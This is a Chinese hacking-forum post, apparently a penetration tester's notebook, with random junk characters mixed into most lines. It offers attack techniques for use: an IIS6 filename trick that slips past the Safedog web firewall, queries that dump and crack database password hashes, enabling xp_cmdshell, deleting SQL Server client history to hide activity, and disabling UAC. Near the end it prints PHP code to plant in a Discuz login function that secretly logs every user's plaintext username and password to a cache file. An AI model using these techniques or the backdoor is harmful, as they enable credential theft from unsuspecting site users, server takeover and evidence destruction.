在它下面直接插入即可,记录的密码生成在pwd.txt中,- `; X1 C- d3 D) _" ]# M
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录* C0 p% t. k1 ?* y) L+ m
利用II6文件解析漏洞绕过安全狗代码:9 ~7 f) i. r, M  j. ~
;antian365.asp;antian365.jpg+ v$ a. ?$ h$ c5 o: T

% M! s- U, q- u* Q6 W各种类型数据库抓HASH破解最高权限密码!
: Y. v7 @, e3 f, M, C5 F; t1.sql server20000 h& j' p* j$ b) X  n7 x
SELECT password from master.dbo.sysxlogins where name='sa'
; e# v% }6 e/ U3 a+ e. C0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503413 L: M+ m! {$ O6 J$ z2 e& ?
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A: `* X$ S% E% z& n7 t
" [! ?, D3 t( L$ e2 k, S
0×0100- constant header2 H: |( n9 u+ u: T) I; k/ F/ H* F6 o
34767D5C- salt4 d( x2 x8 q- {
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash# {! @  ~* W6 K1 ^/ C
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
% W* x/ ]; k: K0 n6 [crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
# J8 {+ b0 b: e" o0 gSQL server 2005:-
5 @. E9 u' L1 c, r0 [& {SELECT password_hash FROM sys.sql_logins where name='sa'
$ n6 l; Q: H1 V7 u1 D6 j7 h% }0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F' F8 i6 o- ?) r& d& Q
0×0100- constant header
1 C$ U# w$ V/ a9 T1 l' s993BF231-salt
% ?' W  S( J3 l; P5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
# K- X% G) q8 \# tcrack case sensitive hash in cain, try brute force and dictionary based attacks.
* L. O" X. p9 t4 N) q
2 z, I: E) N# S& B- vupdate:- following bernardo’s comments:-
: @2 O* a! g  o1 `# \# p; h1 K9 i8 Juse function fn_varbintohexstr() to cast password in a hex string.
$ z- m+ i6 n0 Z0 C7 D2 c, S/ Ye.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
8 k* R6 ^0 V* w  G" n5 c1 u0 e/ P  ^9 n3 L. t; H) w
MYSQL:-
, u/ k7 [6 K( j% q& D. n6 I8 e" {" Q' N+ T* B
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
2 N5 S) C2 h  B- }9 E7 b
3 |! e. P0 [& e) o  N% K, s*mysql  < 4.1  B. n: S. c# E: u$ G8 |
- [+ ~' @0 J* g/ {
mysql> SELECT PASSWORD(‘mypass’);6 x" d/ G" r5 x( q* a% l- j9 ]
+——————–+  X( {6 R; K. g; L9 Z4 s
| PASSWORD(‘mypass’) |2 e# G7 m% f2 u: h3 Y
+——————–+
  Q8 R4 Y% J7 A9 L$ Q- D( y6 p! b% y| 6f8c114b58f2ce9e   |
1 }  Z) ~2 Z# c* f+——————–+" G) |5 ~( W) z
" R+ Z  y* @5 o% a5 c: s9 D
*mysql >=4.1
0 q' c- W4 ?0 P5 E
5 A, t8 P; D8 N8 X5 z' [% rmysql> SELECT PASSWORD(‘mypass’);
7 M* f, t# ]! Q4 k5 M4 j2 B: C- I+——————————————-+# [& X4 B3 g! F5 _/ }$ ^
| PASSWORD(‘mypass’)                        |9 n% m: m( Y7 ~/ d3 |9 |
+——————————————-+" U3 A7 H" q* ]( X, h8 T6 f$ j
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
# N* p  s# ], P+ B0 E+——————————————-+  K2 |, I5 F: i" g( g& Y

5 j; x* \% S( hSelect user, password from mysql.user: p9 N# O7 \/ r5 M2 y
The hashes can be cracked in ‘cain and abel’
' n0 l9 O$ f2 p1 B3 @. D) K& f& {7 }6 Y5 u( S9 R
Postgres:-$ J) i9 \8 K% W5 y3 O7 b- Q
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)+ Q) a7 L* E6 c4 M
select usename, passwd from pg_shadow;
) t3 W& P: Q1 v* @1 l/ t% S$ nusename      |  passwd& w4 ^* F# r7 B9 T5 Q1 T4 ^2 [+ V
——————+————————————-
0 m6 g! \; b$ X( i) {7 y2 J: `testuser            | md5fabb6d7172aadfda4753bf0507ed4396, v  `: p& J+ c! W2 f: `& W( s
use mdcrack to crack these hashes:-
, q2 T' o$ w: Z( a& a4 ?7 @$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
5 T+ o' E/ c. V$ U* X! R! t! k9 \, ~% ]& ^. n
Oracle:-5 x& F( R8 ?" x5 G6 Z3 Z0 J! d; D
select name, password, spare4 from sys.user$
+ C; g+ w4 w2 V7 ?0 Zhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g* u6 H# O( [5 A3 k# v7 C
More on Oracle later, i am a bit bored….+ C9 y1 d" D. Z  K' B

  K! k! S; g" B" s) Q' U
* f9 ]/ r/ m) p$ V# q7 X; y% w在sql server2005/2008中开启xp_cmdshell
5 ], x" P3 G8 u5 V/ _# ~-- To allow advanced options to be changed.* I7 Z4 _2 e# M/ I. ]
EXEC sp_configure 'show advanced options', 1. Z, v  H" |: d/ p
GO
. x3 x+ x0 @4 ^8 `" }$ a-- To update the currently configured value for advanced options.9 {- P' i) F" x' u! p; u3 A1 r0 }
RECONFIGURE! v9 @& q  V. x, I8 y& \9 k
GO) w1 |+ l$ K' j: F5 Y7 Y7 O3 Q
-- To enable the feature.
. |3 F4 Z. m* {9 H8 {EXEC sp_configure 'xp_cmdshell', 1
3 s: u% u) E) _8 ?5 n0 ]" B' NGO9 H" H, @* d' i) H: ^
-- To update the currently configured value for this feature.: o" A9 J! [4 G, Z
RECONFIGURE
7 O& N4 @2 z# H( }GO- c" l! \. M& S6 h  ]
SQL 2008 server日志清除,在清楚前一定要备份。
; G% u2 `$ f/ i/ I8 [如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
( ?& d! L. Y) c& A2 kX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
/ _& ?# G+ g8 {2 G( h0 R
. ~9 A$ ^# \1 G+ u2 J1 C对于SQL Server 2008以前的版本:
5 g) J7 J3 U6 W% ?9 t* q( N. E4 z5 K- ISQL Server 2005:- `. U4 F) z' ~. C: y) S3 _
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
4 [4 j' I$ C& YSQL Server 2000:4 o8 v, B7 N3 [6 J3 ~+ A5 o
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。( H7 u7 b: g, l. `
6 ~+ O2 j) a+ e
本帖最后由 simeon 于 2013-1-3 09:51 编辑' r5 S  ]  d5 t/ r  W* a. g
' j5 V2 y( h4 [

7 x  C" w$ ]1 v; q* _. y! |. fwindows 2008 文件权限修改4 I- |+ E4 ?9 e* i7 x* |
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
/ \1 A/ L: E7 I. \! m2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad985 c* I5 S6 M- V% }
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,: y$ h+ P6 T: u) e% A
: C) L$ T7 `* w5 {/ ]
Windows Registry Editor Version 5.00
7 H, P4 u  t# H[HKEY_CLASSES_ROOT\*\shell\runas]% L5 m$ O: e# N8 u  m9 Q9 J2 x; m
@="管理员取得所有权"1 z# o2 \& u) S. B1 U
"NoWorkingDirectory"=""( m- E( l1 P# e& J  s
[HKEY_CLASSES_ROOT\*\shell\runas\command]
1 `# N3 r& e7 w# v* s0 B! s@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) e9 ?" p9 W* ]"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" }+ W! W+ q, \) O
[HKEY_CLASSES_ROOT\exefile\shell\runas2]! c$ G1 b  M5 G! @: P4 O4 @
@="管理员取得所有权"
5 B5 ^$ `9 ?) a2 I. \( V"NoWorkingDirectory"=""  _  ]& r9 M9 y- j; J! j
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
/ h6 B5 n$ p/ Z@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' ^7 W1 v. f. X9 R: X6 q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 H+ r9 S. X( E, e6 {' j8 b
1 z8 p" `3 b9 k" B5 J
[HKEY_CLASSES_ROOT\Directory\shell\runas]
: z( |  }$ m$ o; `@="管理员取得所有权"& _1 f4 z6 K, [7 O
"NoWorkingDirectory"=""
# s3 C3 L7 [, @' f! _7 K  i[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
' R, n" ?* M+ A, V  h& V# N) u@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"3 D7 R& k6 }9 b% O4 ], S# R& g) x
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
1 o- g) V! @9 r3 j% v/ f: M; u8 m
% x" \8 }1 |5 G. a; `6 g: D2 v5 j7 a
win7右键“管理员取得所有权”.reg导入
5 k( u/ c! j# ^& j! \二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
' m( B: z5 z& H# R; ^1、C:\Windows这个路径的“notepad.exe”不需要替换! r$ ]. X" {7 D* \# f
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换2 G( Z5 G1 ~7 T4 b  c
3、四个“notepad.exe.mui”不要管
* v4 @8 R* N# G$ y4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和! T& b/ z( V6 ~0 K9 d
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
( X9 ~( D6 J; T$ ~) G5 a, i替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
# S2 r3 ^& Y  N4 U) }# ^. w8 N替换完之后回到桌面,新建一个txt文档打开看看是不是变了。2 f. ~  T  @) G4 _" i  h: P: C
windows 2008中关闭安全策略:   Y5 j# x5 U: V8 c& A+ n$ h
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f( W! {2 k2 {' w: r& E, b
修改uc_client目录下的client.php 在
( x! S3 l$ O; C( E& {/ M* Rfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
( s/ V5 Y/ N, N0 M# l1 Y下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
' d% A( E' \. o- N0 b你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
' o+ J) e4 P0 J- pif(getenv('HTTP_CLIENT_IP')) {
) x1 m/ r2 W1 S8 O$onlineip = getenv('HTTP_CLIENT_IP');3 [' S# Z5 B0 F' h7 C/ L: s( U
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
8 I5 W; _8 z  N" L. }' L$onlineip = getenv('HTTP_X_FORWARDED_FOR');+ e+ y3 x/ G" z. t2 K0 b
} elseif(getenv('REMOTE_ADDR')) {
8 ]# d4 m& b1 p) z: ~3 i: u( B  ?$onlineip = getenv('REMOTE_ADDR');. s! E# x9 B0 E$ n( ?  P  {9 N2 q
} else {
, I5 s# I: F0 s* o$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];# \! l" k& i) M, x! u- k" F2 c3 s
}
3 @& m4 o; {1 E1 D, e2 k     $showtime=date("Y-m-d H:i:s");7 P- g9 B. e0 P. g- w  ^# |. @; H- q
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";2 U# }- G- c* r! u
    $handle=fopen('./data/cache/csslog.php','a+');
, H: f9 |: s6 Z! T# N  _    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表